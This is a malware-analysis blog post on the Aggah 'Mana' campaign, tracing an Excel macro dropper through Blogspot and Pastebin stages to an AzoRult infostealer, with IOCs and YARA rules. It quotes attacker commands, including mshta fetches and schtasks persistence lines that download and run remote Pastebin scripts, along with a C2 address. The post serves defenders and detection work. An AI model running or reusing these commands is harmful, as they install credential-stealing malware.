APT or not APT? What’s Behind the Aggah Campaign

Introduction

During our threat monitoring activities, we discovered an interesting drop chain related to the well-known Aggah campaign, the ambiguous infection chain observed by Unit42 which seemed to deliver payloads potentially associated with the Gorgon Group APT. After that, we discovered other malicious activities using the same TTPs and infrastructures, for instance in “The Enigmatic “Roma225” Campaign” and “The Evolution of Aggah: From Roma225 to the RG Campaign” reports. 

But, despite the very similar infection chain, this latest attacks revealed a curious variation of the final payload, opening up to different interpretations and hypothesis about the “Aggah” activities.

Technical Analysis

Hash7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87
ThreatExcel document Dropper
Brief DescriptionFirst stage of Aggah campaign
Ssdeep768:4Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJrqYtAd/fBuzPRtUb:hk3hOdsylKlgxopeiBNhZFGzE+cL2kd3

Table 1. Sample’s information

As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. It immediately appears obfuscated and after a de-obfuscation phase, we discovered it invokes the following OS command:

mshta.exe http://bit[.ly/8hsshjahassahsh

The bit.ly link redirects on the attacker’s page hosted on Blogspot at hxxps://myownteammana.blogspot[.com/p/otuego4thday.html. This is the typical Aggah modus operandi. In fact, the webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine.

Figure 1. HTA script hidden into Blogspot page

Figure 2. Deobfuscated HTA script

This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive the reboot.

Figure 3. Another obfuscated Javascript snippet

In detail, the malware uses three mechanisms to ensure its persistence on the victim machine:

  • the creation of a new task called “Windows Update” that triggers every 60 minutes; 
  • the creation of another task called “Update” that triggers every 300 minutes;
  • the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate” registry key;

Each entry contact pastebin.com to download and execute further payload. The interesting fact is that the URL referred by tasks and regkey are different from each other, so the attacker is able to deliver more than a payload by just changing one of the pastes.

Figure 4. Code used to set persistence

During the analysis, all the three URL pointed to the same script, which is reported in the following screen. The cleaned code reveals a byte array composing Powershell commands. It downloads two other snippets from Pastebin. 

Figure 5. Deobfuscation process

Figure 6. Powershell script used to inject the final payload in legit process

The first one corresponds to the “Hackitup” DLL file, previously discussed in our previous report. The second paste is the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during the analysis we identified another kind of final stage. 

The AzoRult Payload

Hash37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1
ThreatAzoRult 
Brief DescriptionAzoRult final payload
Ssdeep3072:tuOSXpMx7ZAlHsbfUkolNGti7lfqeSxM3SpyEY3E/qxg/:Zzx7ZApszolIo7lf/ipT/q

Table 3. Sample’s information

This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, credentials and other navigation data.

Figure 7. AzoRult tries to extract info from browsers files

Having a deeper look to the command and control infrastructure we noticed some interesting details. In fact, we discovered the particular, customized, AzoRult 3.2 fork called “Mana Tools”. At the same time, reviewing the infection chain data revealed the presence of a reference to this “Mana” customization even in the blogspot page abused in the first steps of the chain. 

Figure 8. Blogspot page (on the left); “Mana” logo related to AzoRult C2

Conclusion

We have monitored the campaign and its final payload for different days finding the attacker delivered AzoRult samples only a few times, during the first days of September 2019, and after that it resumed to deliver RevengeRAT samples.

The “Mana” campaign opens to a series of hypothesis about the threat actor behind it. According to Palo Alto Networks, the “Aggah” infection chain could have been used by GorgonGroup too, but with a different payload. So, it is possible that Gorgon added this particular AzoRult version to their arsenal, maybe to retrieve initial information about its initial victims or to increase their recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his AzoRult payload, which is a commodity malware, or also the actors behind the “Hagga” Pastebin account used their own infection chain to conduct its own attack campaign. Many question only further hunting could answer.

Indicator of Compromise

  • Hashes
    • 7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87
    • 84833991f1705a01a11149c9d037c8379a9c2d463dc30a2fec27bfa52d218fa6
    • 37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1
    • c2d594e23480215c94dc7f79cf50af3b3b4270fa3a60aea81f877bd787a684a4
    • a318ce12ddd1b512c1f9ab1280dc25a254d2a1913e021ae34439de9163354243
    • cfd1363ce16156e55460b29bf4d62045ebcd5180af50d732c2353daf12618c18
  • Persistence
    • schtasks /create /sc MINUTE /mo 60 /tn Windows Update /tr mshta.exe http://pastebin.com/raw/vXpe74L2 /F
    • schtasks /create /sc MINUTE /mo 300 /tn “”Update”” /tr mshta.exe http://pastebin.com/raw/JdTuFmc5 /F
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate
  • C2
    • hxxp://170.130.205.86/index.php

Yara Rules

import "pe"
rule Mana_Aggah_campaign_excel_dropper_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign Excel dropper"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {64 68 61 73 6A 00 6B 68 64 61 6B 6A 73 68 00 64 6B 61 28 29}
   		 $a2 = {61 70 74 77 4D 71 55 45 27}

    condition:
   	 all of them
}


rule Mana_Aggah_campaign_injector_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign DLL injector"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {4D 5A}
   		 $a2 = {93 E5 21 3F 59 AE}
   		 $a3 = {11 08 28 22}
   		 $a4 = "v2.0.507"
   		 $a5 = {E2 80 8C E2 80}
   		 $a6 = {81 AC E2 81 AF E2 80 AE}
   		 $a7 = {E2 81 AA E2 80}
   		 $a8 = {81 AF E2 80 AA}
   		 $a9 = {81 AC E2 81 AF E2 80 AE}
   		 $a10 = {C5 C7 4C 9E 65 A5 B6 42}

    condition:
   	 6 of ($a*)
}

rule Mana_Aggah_campaign_AzoRult_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign AzoRult sample"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
		$h1 = {4D 5A 50}
		$bob1 = {55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8}
		$bob2 = {55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8}
		$bob3 = {55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8}
		$s1 = "SOFTWARE\\Borland\\Delphi\\RTL" ascii wide
		$s2 = "moz_historyvisits.visit_date" ascii wide
		$s3 = "\\BitcoinCore_custom\\wallet.dat" ascii wide
	condition:
		$h1 and all of ($s*) and 1 of ($bob*)
}

This blog post was authored by Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB